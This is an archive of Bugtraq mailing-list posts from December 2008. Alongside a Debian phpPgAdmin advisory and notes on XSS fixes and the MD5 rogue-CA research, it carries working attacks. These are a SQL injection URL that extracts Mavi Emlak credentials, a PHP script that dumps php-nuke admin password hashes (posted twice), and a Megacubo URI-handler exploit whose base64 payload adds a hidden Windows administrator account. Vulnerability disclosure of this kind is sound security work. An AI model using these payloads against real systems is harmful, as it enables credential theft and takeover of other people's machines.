Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJWNMwmqjQ0CJFipgRAk+bAJsFVF5WMeKu0hKxukXcA6JTSKMY+wCfWF/f
KqSnkrun4hzgHQnJeU6dXzk=GRnr
-----END PGP SIGNATURE-----

From - Mon Dec 29 14:20:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c0000551f
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39043-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 19879EC0B3
for <lists@securityspace.com>; Mon, 29 Dec 2008 14:13:59 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id EF8C31438EB; Mon, 29 Dec 2008 11:00:00 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20488 invoked from network); 25 Dec 2008 20:18:09 -0000
Date: Thu, 25 Dec 2008 13:23:29 -0700
Message-Id: <200812252023.mBPKNT3K003492@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: r3d.w0rm@yahoo.com
To: bugtraq@securityfocus.com
Subject: Mavi Emlak Sql Injection
Status:   

#####################################################################################
####                         Mavi Emlak Sql Injection                          ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
#                                                                                   #
#Download : http://dl.p30vel.ir/scripts/Asp-Amlak-Best-Pro-Eh3an.p-(www.p30vel.ir).rar
#                                                                                   #
#Dork :  2004 Copyright by Mavi Emlak Danismanligi                                 #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://Site/[path]/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar
#                                                                                   #
#Admin panel : http://Site/[path]/yonet                                             #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

From - Mon Dec 29 14:30:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005520
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39036-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 31D9BEC0B4
for <lists@securityspace.com>; Mon, 29 Dec 2008 14:21:57 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1426F1437CB; Mon, 29 Dec 2008 10:44:14 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19350 invoked from network); 27 Dec 2008 11:34:27 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <thijs@debian.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
Message-Id: <20081227115426.28809326885@morgana.loeki.tv>
Date: Sat, 27 Dec 2008 12:54:26 +0100 (CET)
From: thijs@debian.org (Thijs Kinkhorst)
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-8.58 tagged_above=3.6 required=5.3
tests=[FOURLA=0.1, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2,
PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1693-1] New phppgadmin packages fix several vulnerabilities
Priority: urgent
Resent-Message-ID: <cPuxAMmA9tB.A.FcE.RehVJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sat, 27 Dec 2008 11:54:57 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1693-1                  security@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
December 27, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : phppgadmin
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-2865 CVE-2007-5728 CVE-2008-5587
Debian Bugs    : 427151 449103 508026

Several remote vulnerabilities have been discovered in phpPgAdmin, a tool
to administrate PostgreSQL database over the web. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-2865

    Cross-site scripting vulnerability allows remote attackers to inject
    arbitrary web script or HTML via the server parameter.

CVE-2007-5728

    Cross-site scripting vulnerability allows remote attackers to inject
    arbitrary web script or HTML via PHP_SELF.

CVE-2008-5587

    Directory traversal vulnerability allows remote attackers to read
    arbitrary files via _language parameter.

For the stable distribution (etch), these problems have been fixed in
version 4.0.1-3.1etch1.

For the unstable distribution (sid), these problems have been fixed in
version 4.2.1-1.1.

We recommend that you upgrade your phppgadmin package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1.orig.tar.gz
    Size/MD5 checksum:   703673 eedac65ce5d73aca2f92388c9766ba1b
  http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch1.dsc
    Size/MD5 checksum:      890 e6dea463d597f6dda40d774820e3bb03
  http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch1.diff.gz
    Size/MD5 checksum:    15678 1cbe0f619e65a8c49894e8c0fe015fb5

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch1_all.deb
    Size/MD5 checksum:   704386 1f5b68f6be269eb3c10646cd8d69c31c


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSVYXX2z0hbPcukPfAQL7Jgf8D01CiY6dpQO7AUmDCU/sNIHnMudx5ZEC
y/Yk0b2raMmtJeejXpdD4zRpPGOIx4LBefh2BmyyC18vPzdjbX/5MbXvOewmeqm3
6eI6clMf5rpbb7jnzL1SxqMwt+7YocmU30JiWMbuXggrCUpawsxROTMIJkVqT86c
Yg8DKOWpLt43YAYl+IRx2sbmDP/kGN2omn6pBnkqcIeQh8wB7CNmSEeSlkH0iOTS
EoTOyjTWhTFAz1T8bG6A6YSmgBSTZ+tEb1eqODMB1y8POQ7k4B4MmCA1OPNtJuoq
EEB2KoaDJkkhS8anv2fyYEmufZBTqD8AGsFPGttqSMBQyR9XdYD5cg==J4km
-----END PGP SIGNATURE-----

From - Mon Dec 29 14:50:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005521
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39032-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 5E950EC0B3
for <lists@securityspace.com>; Mon, 29 Dec 2008 14:42:28 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 19BD5143704; Mon, 29 Dec 2008 10:37:09 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24124 invoked from network); 26 Dec 2008 00:17:54 -0000
Date: Thu, 25 Dec 2008 17:21:51 -0700
Message-Id: <200812260021.mBQ0Lpw3022376@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: nospam@mail.it
To: bugtraq@securityfocus.com
Subject: Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter
 injection POC
Status:   

Attack vector is Internet Explorer 7/8b against a system with a coexistent google chrome installation. It works exactly like this:
http://www.milw0rm.com/exploits/7181

From - Tue Dec 30 11:40:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005535
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39044-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 7C82EED83D
for <lists@securityspace.com>; Tue, 30 Dec 2008 11:35:59 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 063DA143728; Tue, 30 Dec 2008 09:02:01 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28216 invoked from network); 29 Dec 2008 21:47:10 -0000
Date: Mon, 29 Dec 2008 16:08:06 -0600 (CST)
From: Gadi Evron <ge@linuxbox.org>
To: bugtraq@securityfocus.com
Subject: reliable IOS exploitation
Message-ID: <alpine.DEB.0.999999.0812291607290.17054@linuxbox.org>
User-Agent: Alpine 0.999999 (DEB 847 2007-12-06)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-1.7.5 (linuxbox.org [127.0.0.1]); Mon, 29 Dec 2008 16:08:07 -0600 (CST)
Status:   

FX has given a comprehensive talk about IOS exploitation (including even TCL 
scripts operators leave behind when they moved jobs to retain access).

He has shown effective and ineffective ways of detecting compromise in IOS.

Then, he has shown how reliable exploitation of IOS routers works.

His talk will probably be downloadable from the CCC (25C3) web site by 
tomorrow.

  Gadi.

From - Tue Dec 30 11:50:39 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005536
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39046-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 208EEED87A
for <lists@securityspace.com>; Tue, 30 Dec 2008 11:47:57 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id D827F143890; Tue, 30 Dec 2008 09:02:57 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12044 invoked from network); 30 Dec 2008 14:10:54 -0000
Date: 30 Dec 2008 14:31:59 -0000
Message-ID: <20081230143159.27402.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: the.dumenci@gmail.com
To: bugtraq@securityfocus.com
Subject: php-nuke 8.0 module sections artid blind sql inj vuln.
Status:   

<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);
echo '
+=========================================================+
|PHP-NUKE Module Sections printpage artid Sql inj Vuln.
|&#304;MHAT&#304;M&#304;.ORG BugBUSTER Team. |
+=========================================================+
<+> version <8.0
<+> Tested on 7.9 & 6.0
';

if ($argc < 2){
print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* Ac&#305;klama */
if (empty($argv[3])){ $prefix = 'nuke';} #Prefix girin.
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query ="modules.php?name=Sections&op=printpage&artid999+union+select+aid,pwd+from+".$prefix."_authors";
$version = 6;
break;
default:
$query ="modules.php?name=Sections&op=printpage&artid999'+union+select+aid,pwd+from+".$prefix."_authors";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Hashs.: ".$matches[0];
if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
else {echo "Basar&#305;s&#305;z(Exploit Failed)...";}

credits();


function credits(){
print "\n\n+========================================+\n\r Coded By dumenci \n\r Copyright (c) BugBUSTERs";
print "\n\r+========================================+\n";
exit;
}

?>

From - Tue Dec 30 12:00:47 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005537
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39045-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 61767ED87D
for <lists@securityspace.com>; Tue, 30 Dec 2008 11:53:26 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id F3F211437BD; Tue, 30 Dec 2008 09:02:28 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28565 invoked from network); 29 Dec 2008 22:05:00 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:reply-to
         :user-agent:mime-version:to:subject:references:in-reply-to
         :content-type:content-transfer-encoding:from;
        bh=g4TICMmD2fypgKFLBwe3xu538k7NmHiGALiuIMmiDjY=;
        b=q35odBzoZgqTL8cizIjgDkfnhe7MTUY3+RT0MFySqDKwsPSyLvUqrdADWHlGeCj7PC
         bWO2zdQq8C/Apb3C2P+s5gF82T8gR6FmjOLajyj3fScJhnrQMX4wq57Y7Va/UYhc6YPR
         LH84LLYyxWZVuD/n+FYvUMHVbjbLtf4O8Pz9oDomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:reply-to:user-agent:mime-version:to:subject
         :references:in-reply-to:content-type:content-transfer-encoding:from;
        b=J4nYOVGLs6RSmN/AP8oEObvRkgfP9B+qdCVNsHiUsCxs8Dz4t3VN9YNwBF/ACBwnAx
         bQ++LkyGo2QBydmwawDNJLWLr/XO6fZJvKffhSbgA3DS8lCbLCSltiFWEJwHZtzRCh+r
         9/y0cNpPhgtMcy18CtJVVUImzbQNzxJkg0rN0Message-ID: <49594E2E.2010609@geckotribe.com>
Date: Mon, 29 Dec 2008 16:24:46 -0600
Reply-To: antone@geckotribe.com
User-Agent: Thunderbird 2.0.0.14 (Macintosh/20080515)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: Re: MagpieRSS XSS 0day
References: <20081228225056.3869.qmail@securityfocus.com>
In-Reply-To: <20081228225056.3869.qmail@securityfocus.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
From: Antone Roundy <electriceel@gmail.com>
Status:   

admin@elites0ft.com wrote:
> it is a simple fix: htmlentities() around the parsed CDATA.

The problem with this solution is that if the feed contains harmless 
HTML that's used for formatting, the HTML code becomes visible and the 
formatting is lost.

A better solution is to strip out HTML tags.  Either strip out all tags, 
or create a whitelist of tags that are allowed and strip out all others 
(if you want to keep any formatting, links, etc. provided by harmless 
HTML).  Of course, if you do that, you also need to strip out JavaScript 
handlers (onMouseOver, etc.) since they could also trigger something 
harmful.

If writing the code to do that sounds too complicated, just use a script 
that does it for you like CaRP (full disclosure: I'm the author of CaRP).

Antone Roundy

From - Tue Dec 30 12:10:46 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005538
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39047-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 27EF9ED563
for <lists@securityspace.com>; Tue, 30 Dec 2008 12:01:42 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id D819F1438E4; Tue, 30 Dec 2008 09:03:25 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12526 invoked from network); 30 Dec 2008 14:41:26 -0000
Date: Tue, 30 Dec 2008 07:45:32 -0700
Message-Id: <200812301445.mBUEjW23004493@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: pyro@nospam.it
To: bugtraq@securityfocus.com
Subject: Megacubo 5.0.7 (mega://) remote eval() injection exploit
Status:   

<!--
Megacubo 5.0.7 (mega://) remote eval() injection exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

tested against Internet Explorer 8 beta 2/xp sp 3

software site: http://www.megacubo.net/tv/
download url: http://sourceforge.net/project/showfiles.php?group_id#1636&package_id(0849&release_id`8023

description:
"Megacubo is a IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows(2000,
XP and Vista)."
(note that it is among most downloaded apps on sourceforge, http://sourceforge.net/softwaremap/trove_list.php?form_cat)

explaination:
it's possible to pass arbitrary php code to the "play" command
of "mega://" uri handler which is further copied to the
c:\DATASTORE.txt temporary file and evaluated, note the "con"
argument (which is a windows device name) to bypass a file_exists()
check

example exploit, this run calc.exe:

mega://play|con.."a()".system(base64_decode('Y21kIC9jIHN0YXJ0IGNhbGM='))."/?");print(

the following one execute:
cmd /c NET USER pyrokinesis pass /ADD && NET LOCALGROUP Administrators /ADD pyrokinesis
-->

<a href='mega://play|con.."a()".system(base64_decode(Y21kIC9jIE5FVCBVU0VSIHB5cm9raW5lc2lzIHBhc3MgL0FERCAmJiBORVQgTE9DQUxHUk9VUCBBZG1pbmlzdHJhdG9ycyAvQUREIHB5cm9raW5lc2lz))."/?");print('>pwn</a>

---

original url: http://retrogod.altervista.org/9sg_megacubo.html

From - Wed Dec 31 10:50:40 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000055f1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39048-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C8FE1ED848
for <lists@securityspace.com>; Wed, 31 Dec 2008 10:46:12 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0DF5C236F87; Wed, 31 Dec 2008 08:31:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 16420 invoked from network); 30 Dec 2008 16:30:03 -0000
Date: Tue, 30 Dec 2008 11:50:57 -0500
From: Alexander Sotirov <alex@sotirov.net>
To: bugtraq@securityfocus.com
Subject: MD5 Considered Harmful Today: Creating a rogue CA certificate
Message-ID: <20081230165057.GA7929@81-163-137-128.visitor.congress.ccc.de>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="SUOF0GtieIMvvwua"
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Status:   


--SUOF0GtieIMvvwua
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Our research team, consisting of 7 researchers from the United States,
Switzerland and the Netherlands, was able to execute a practical MD5 collision
attack and create a rogue Certification Authority trusted by all common web
browsers. This allows us to perform transparent man-in-the-middle attacks
against SSL connections and monitor or tamper with the traffic to secure
websites or email servers.

The infrastructure of Certification Authorities is meant to prevent exactly
this type of attack. Our work shows that known weaknesses in the MD5 hash
function can be exploited in realistic attack, due to the fact that even after
years of warnings about the lack of security of MD5, some root CAs are still
using this broken hash function.

More details:
http://www.phreedom.org/research/rogue-ca/

Enjoy!

Alex

--SUOF0GtieIMvvwua
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAklaUXEACgkQ6MVeVwnnQQStoQCdF5eIxqKx515soMee2sVgEACc
N7AAn1gOtnDC5f1tqB/RxMpfZ1rY+wnU
=Fpsd
-----END PGP SIGNATURE-----

--SUOF0GtieIMvvwua--

From - Wed Dec 31 11:00:39 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000055f2
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39049-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 82C62EC94A
for <lists@securityspace.com>; Wed, 31 Dec 2008 10:58:47 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 1A40C236FD0; Wed, 31 Dec 2008 08:33:57 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18617 invoked from network); 30 Dec 2008 17:40:34 -0000
Subject: Re: php-nuke 8.0 module sections artid blind sql inj vuln.
From: John Haywood <john@code-authors.com>
Reply-To: john@code-authors.com
To: the.dumenci@gmail.com
Cc: bugtraq@securityfocus.com
In-Reply-To: <20081230143159.27402.qmail@securityfocus.com>
References: <20081230143159.27402.qmail@securityfocus.com>
Content-Type: text/plain
Date: Tue, 30 Dec 2008 19:01:35 +0100
Message-Id: <1230660095.3459.13.camel@john-desktop>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.2 
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - host2.montegoservices.com
X-AntiAbuse: Original Domain - securityfocus.com
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - code-authors.com
Status:   

The 'Sections' module was removed from phpNuke years ago, probably
around version 7.4 (2006) and was replaced by the 'Content' module.

John Haywood


-----Original Message-----
From: the.dumenci@gmail.com
To: bugtraq@securityfocus.com
Subject: php-nuke 8.0 module sections artid blind sql inj vuln.
Date: 30 Dec 2008 14:31:59 -0000

<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);
echo '
+=========================================================+
|PHP-NUKE Module Sections printpage artid Sql inj Vuln.
|&#304;MHAT&#304;M&#304;.ORG BugBUSTER Team. |
+=========================================================+
<+> version <8.0
<+> Tested on 7.9 & 6.0
';

if ($argc < 2){
print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* Ac&#305;klama */
if (empty($argv[3])){ $prefix = 'nuke';} #Prefix girin.
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query ="modules.php?name=Sections&op=printpage&artid999+union+select+aid,pwd+from+".$prefix."_authors";
$version = 6;
break;
default:
$query ="modules.php?name=Sections&op=printpage&artid999'+union+select+aid,pwd+from+".$prefix."_authors";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Hashs.: ".$matches[0];
if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
else {echo "Basar&#305;s&#305;z(Exploit Failed)...";}

credits();


function credits(){
print "\n\n+========================================+\n\r Coded By dumenci \n\r Copyright (c) BugBUSTERs";
print "\n\r+========================================+\n";
exit;
}

?>


From - Wed Dec 31 11:10:39 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000055f6
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39050-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 51088ED879
